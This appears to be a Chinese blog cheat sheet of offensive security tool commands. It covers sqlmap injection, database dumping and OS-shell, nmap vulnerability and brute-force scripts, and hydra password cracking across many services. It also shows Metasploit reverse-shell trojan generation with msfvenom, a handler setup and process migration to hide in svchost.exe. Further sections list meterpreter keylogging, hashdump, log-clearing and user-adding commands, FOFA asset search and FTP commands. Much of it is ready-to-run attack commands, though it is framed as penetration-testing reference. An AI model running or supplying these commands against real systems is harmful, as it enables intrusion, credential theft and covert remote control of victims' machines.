Common attack tools Commands | Network security

本文详细介绍了几个常见的网络安全工具的使用方法,包括sqlmap的注入检测、获取数据库信息和shell,nmap的端口扫描和脚本扫描功能,hydra的密码爆破,以及MSF的攻击流程和反弹木马创建。此外,还提到了FOFA的资产搜索和FTP命令的运用,为网络安全测试和渗透测试提供了实用的参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文授权自 MagicBoy


1. sqlmap

1.1. sqlmap注入检测

功能命令
GET参数注入sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1”
sqlmap默认测试所有的GET和POST参数,但可以手动用-p参数设置想要测试的参数。例如:-p “id,user-anget”
当使用–level的值很大但是有个别参数不想测试的时候可以使用–skip参数
POST参数注入sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1” --data=“id=1”
sqlmap.py -r “c:\Users\fendo\Desktop\post.txt” -p n --dbs (-r表示加载一个文件,-p指定参数)
cookie注入 (level>=2时才会检测cookie)sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --level 2
sqlmap -r “/root/1.txt” (POST注入过程中,用 * 号指定cookie,这样就可以检测cookie。)
user-agent注入sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --level 3
sqlmap -r “/root/1.txt” (POST注入过程中,用 * 号指定user-agent,这样就可以检测user-agent。)
referer注入sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --level 3
sqlmap -r root/1.txt" (POST注入过程中,用 * 号指定referer,这样就可以检测referer。)
host注入sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --level 5
sqlmap -r root/1.txt" (POST注入过程中,用 * 号指定referer,这样就可以检测referer。)

1.2. sqlmap获取数据库信息

功能命令
查看数据库sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” --dbs --batch
查看数据库里面的表sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” -D security --tables --batch
查看数据库表里面的列sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” -D security -T users --columns --batch
查看数据库列里面的具体的值sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” -D security -T users -C password --dump --batch

1.3. sqlmap获取shell

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  --os-shell

2. nmap

2.1. 附加参数介绍

附加参数作用
-Pn防止NMAP的发送初始数据包到目标机器,不检测主机存活
-p-将扫描所有65535个端口
-Dip地址欺骗
nmap -D RND:5 ip (RND:为生成随机ip地址)
-p指定端口扫描
-A全面扫描,综合扫描,是一种完整扫描目标信息的扫描方式
-Onmap进行OS探测
-sSTCP、SYN扫描(匿名扫描,默认不加类型,需要root权限,扫描速度快)
-sTTCP全连接扫描(不需要root权限,TCP扫描的默认模式,端口状态和SYN相同,耗时长)
-sUUDP扫描(扫描DNS,SNMP和DHCP等服务,更慢更困难)
-sI用于闲置扫描和发送数据包欺骗
-sV指定nmap进行版本探测
–version-trace显示具体探测细节

2.2. 利用脚本扫描

功能命令
默认脚本扫描,主要搜索各种应用服务的信息,收集后,可再针对具体服务进行攻击nmap --script=default 192.168.88.131
检查是否存在常见漏洞nmap --script=vuln 192.168.1.104
提供暴力破解的方式,可对数据库、smb、snmp等进行简单密码的暴力猜解nmap --script=brute 192.168.88.131
利用FTP指定脚本对目标特定FTP协议进行密码爆破nmap --script=ftp-brute.nse 192.168.88.131
利用第三方的数据库或资源,例如进行whoise解析nmap --script=external 192.168.88.131
利用已知的漏洞入侵系统exploit
模糊测试的脚本,发送异常的包到目标机,探测出潜在的漏洞fuzzer

3. hydra

3.1. 附加参数介绍

附加参数作用
-l小写,指定用户名进行破解
-L大写,指定用户的用户名字典
-p小写,用于指定密码破解,很少使用,一般采用密码字典
-P大写,用于指定密码字典
-e ns额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M指定目标ip列表文件,批量破解
-o指定结果输出文件
-f找到第一对登录名或者密码的时候中止破解
-t tasks同时运行的线程数,默认是16
-w time设置最大超时时间,单位
-v / -V显示详细过程
-R恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x自定义密码

3.2. 爆破

功能命令
破解sshhydra -l 用户名 -p 密码 -t 线程数 -vV -e ns ip ssh
hydra -l 用户名 -p 密码 -t 线程数 -o save.log -vV ip ssh
破解ftphydra -l 用户名 -P 密码 -t 线程(默认16) -vV ip ftp
hydra -l 用户名 -P 密码 -e ns -vV ip ftp
get方式提交,破解web登录hydra -l 用户名 -p 密码 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码 -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form “login.php:id=USER&passwd=PASS: <title> wrong username or password </title>”
(10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解, <title> 中的内容是表示错误猜解的返回信息提示。)
破解httpshydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
破解teamspeakhydra -l 用户名 -P 密码 -s 端口号 -vV ip teamspeak
破解ciscohydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smbhydra -l administrator -P pass.txt 10.36.16.18 smb
破解pop3hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdphydra ip rdp -l administrator -P pass.txt -V
破解http-proxyhydra -l admin -P pass.txt http-proxy://10.36.16.18
破解imaphydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

4. MSF

4.1. 普通攻击流程

msfconsole

search 相关漏洞

use exploit

show options

set LHOST ip

exploit

4.2. 反弹木马

windows32位: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.223.132 LPORT=12345 -i 5 -f exe -o ~/桌面/test.exe


windows64位: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.223.132 LPORT=12345 -i 5 -f exe -o ~/桌面/test.exe


Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555 -a x86 --platform Linux -f elf > shell.elf

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.1.143

set LPORT 12345

exploit

当靶机运行test.exe文件后,即可在kali 端获取连接

4.2.1 msfvenom 参数说明

参数作用
-p指定需要使用的payload(攻击荷载)
-f指定输出格式
-o指定创建好的payload的存放位置
-i指定payload的编码次数
-a指定payload的目标架构,例如x86 还是 x64 还是 x86_64
–platform指定payload的目标平台
PrependMigrate=true PrependMigrateProc=svchost.exe防止太显眼,msfvenom进程migrate,启动两个进程svchost.exe和shell.exe,PrependMigrate=true PrependMigrateProc=svchost.exe将进程默认迁移到svchost.exe中 (也可以写别的进程名)

4.2.2. meterpreter 一些常用命令

命令作用
getwd当前目录
dir查看所有文件
cat c:\123.txt
search -f cmd.exe搜索名为cmd.exe文件所在目录
upload 要上传的文件 -> 上传到的目录上传文件
download 要下载的文件 要下载的目录下载文件
clearev清除日志
getuid当前用户
ps查看所用进程
kill杀死某个进程
sysinfo系统信息
keyscan_start开始键盘记录
keyscan_dump查看结果
keyscan_stop停止键盘记录
screenshot屏幕截图
run vnc屏幕监控
hashdump获取密文密码
shell获取shell
4.2.2.1 windows
命令作用
dir显示所有文件
cd切换目录
whoami查看当前用户级别
net user查看用户列表
net user 用户名 密码 /add添加用户
net user 用户名 密码更改用户密码

5. FOFA

使用方法

语法功能
title=“beijing”从标题中搜索“北京”
domain=“qq.com”搜索根域名带有qq.com的网站
host=“qq.com”搜索host内所有带有qq.com的域名
ip=“58.63.236.248”搜索ip相关信息
支持ip段搜索: ip=“111.1.1.1/16”
port=“6379”查找对应“6379”端口的资产
body=”网络空间测绘”从html正文中搜索“网络空间测绘”
header=“elastic”从http头中搜索“elastic”
icp=“京ICP证030173号”查找备案号为“京ICP证030173号”的网站,搜索网站类型资产
cert=“baidu”搜索证书(https或者imaps等)中带有baidu的资产
server==“Microsoft-IIS/10”搜索IIS-10服务器
app=“Microsoft-Exchange”搜索Microsoft-Exchange设备
is_fraud=false排除仿冒/欺诈数据
is_honeypot=false排除蜜罐数据,仅限FOFA高级会员使用
os=“centos”搜索操作系统为CentOS资产
country=“CN”搜索指定国家(编码)的资产

6. FTP远程连接命令

常用命令

功能命令
连接FTP服务器ftp ip
下载文件a) get remote-file local-file
b) mget remote-files
上传文件a) put local-file remote-file
b) mput local-files
断开连接bye

如有侵权,请联系作者删除

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小饅頭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值